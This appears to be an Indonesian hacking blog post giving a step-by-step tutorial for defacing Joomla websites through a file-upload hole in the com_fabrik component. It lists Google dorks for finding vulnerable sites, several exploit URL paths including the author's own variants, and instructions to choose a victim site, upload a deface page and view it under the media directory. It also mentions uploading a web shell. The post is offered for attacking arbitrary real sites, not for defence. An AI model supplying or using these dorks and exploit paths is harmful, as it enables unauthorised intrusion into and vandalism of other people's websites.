Deface Teknik Com_Fabric | _MisterNotFound_ Official Blog
 

Assalamualaikum sobat Not_Found :)
Pada kesempatan yang boring ini saya tulis beberapa tutor yang sebenarnya udah agak usang.
Yaitu deface website teknik Com_fabric.
Teknik ini memanfaatkan celah upload file pada direktori com_fabric pada CMS Joomla . Teknik ini juga sering menjadi santapan lezat bagi para newbie yang baru belajar deface :)
Langsung aja yok ke TKP :)

1. DORK :
- Inurl:viewTable?cid= site:com 

- Inurl:index.php?option=com_fabrik

2. EXPLOIT UMUM:
- index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

DAN DIBAWAH INI MERUPAKAN EXPLOIT TAMBAHAN YANG SAYA KEMBANGIN :

- index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
- index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=0
- index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=23

3. POC :
- Masukan dork diatas kedalam kotak penelusuran google. Atau bisa langsung caw KESINI
- Cari website yang menurut agan cuco untuk diperawani ;)
- Setelah ketemu, masukan exploit yang sudah saya ukir diatas :)
NOTE : MASUKAN EXPLOIT NYA HARUS LIAT (PATH) NYA DULU.
CONTOH : www.contoh/sito/blabla . Berarti sampeyan musti taro exploit nya dibelakang direktori /sito . Paham ? ;)
- Langsung aja gan di upload Script deface sampeyan

- Jika berhasil akan tampil halaman seperti ini. Notice seperti itu juga menunjukan bahwa website itu vuln :)

- Nah untuk cek hasil deface unyu nya bisa caw ke
http://www.TARGET.com/media/SCRIPT ANDA.html ;)
NOTE : LIAT PATH NYA DULU SOBAT ;)
- FINNISH :)

HASIL SAYA

Nah bisa juga sih upload shell, tapi sekarang untuk nge cek shell yang di upload udah gak bisa.
jadi shell nya musti di tampar tampar dulu agar sukses nebas index nya :)
Sekian dari _MisterNotFound_
Maaf jika ada salah kata. Wassalamualaikum Wr. Wb. :)

Posting Komentar

 
Top